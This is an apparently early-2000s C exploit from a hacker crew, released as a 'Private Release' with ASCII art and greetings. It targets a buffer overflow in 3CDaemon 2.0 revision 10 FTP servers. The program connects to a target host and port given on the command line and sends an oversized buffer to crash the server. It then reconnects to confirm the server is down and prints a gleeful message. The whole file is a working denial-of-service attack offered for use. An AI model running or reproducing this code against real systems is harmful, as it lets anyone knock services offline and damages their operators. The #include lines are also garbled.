/* MaD SKiLL 'H' * MsH 4 life! http://www.madskill.tk * *Private Release* * * 3CDaemon 2.0 revision 10 DoS * * 11:12 14-4-2002: BOF flaw found by skyrim * 1:00 15-4-2002: exploit done. * 23:31 16-4-2002: Edited the exploit slightly, it's a better code now * * This program will exploit the buffer overflow vulnerability of * 3CDaemon 2.0 FTP servers. Sending 400+ chars will make the server crash * at any time they're send. * * Tested on: * [OS] [version] * Windows XP (5.1 - 2600) 3CDaemon 2.0 revision 10 * * ### * ##### #### ## * ###### ###### ###### * ###### ######## ######## ######## ###### * ###### ####### ### ########### ######## ####### * ###### ######## #### ############ ######## ####### * ############### ##### ############ ####### ####### * ############## ###### ############ ####### ####### * ############## ####### ########### ###### ####### * ############# ######## ### ######## ###### ######### * ############ ### #### ### ####### ################# * ##### ############### ########## ################# * ### ######### ##### ######### ################ * #### ######### ##### ######### ################ * ### ######### ############# ################ * ## ######### ###### ###### ####### * ### #### ###### ####### * ###### ######## * ###### ######## * #### ## ###### ### ### ### ###### ######## * ####### ######## ### #### ##### ##### ####### * ############### ### #### ##### ##### ####### * ####### ######## #### ##### ## ### * ###### ######### #### #### ##### * ##### ######## #### #### #### * ###### ######## #### #### ### #### ## * ########## ### #### #### ########## ###### * ######### ### ########################### * ########## ######## ##################### * ############# ###### ########## ########## * ######## ##### #### ### ### ### ### * * I don't know if this will work on versions other then the one I tested it on. * Have fun. * * Crew shouts go to: MsH, DFA, uDc * Personal shouts to: mannie, primus, amok, torment, talented, warsteam, frodo, maxxo, * xo|l, fearless, cybje, kell, frodo, maxxo, and everyone else. * * skyrim (skyrim@m4dskill.tk) */ #include #include #include #include #include #define BOFSIZE 420 char banner(void) { printf("MaD SKiLL 'H' 3CDaemon 2.0 revision 10 DoS\n.:[MsH]:.\n ---\n"); } void E(char *msg) { perror(msg); exit(1); } main(int argc, char *argv[]) { static char ownage[BOFSIZE]; int sockfd, sockfd2, n; struct sockaddr_in server_addr; struct hostent *server; if (argc != 3) { fprintf(stderr,"Usage: %s hostname/ip port\n", argv[0]); exit(1); } banner(); memset(ownage, 'A', BOFSIZE); sockfd = socket(AF_INET, SOCK_STREAM, 0); if (sockfd < 0) E("Error occured during opening socket"); server = gethostbyname(argv[1]); if (server == NULL) E("Error occured during host lookup -No such host?-\n"); bzero((char *) &server_addr, sizeof(server_addr)); server_addr.sin_family = AF_INET; bcopy((char *)server->h_addr, (char *)&server_addr.sin_addr.s_addr, server->h_length); server_addr.sin_port = htons(atoi(argv[2])); printf("Connecting to target FTP server... "); if (connect(sockfd,&server_addr,sizeof(server_addr)) < 0) { E("Error occured during connecting\n"); } printf("Connected, Probing BOF... \n"); n = write(sockfd,ownage,strlen(ownage)); if (n < 0) { E("Error occured during writing to socket"); } close(sockfd); sockfd2=socket(AF_INET, SOCK_STREAM, 0); printf("Done, checking if server is dead.. \n"); sleep(5); if (connect(sockfd2,&server_addr,sizeof(server_addr)) < 0) { printf("Couldn't establish connection: It seems like it died! =)\n"); exit(0); } printf("Server is still alive. Perhaps its not vulnerable?\n"); return 0; }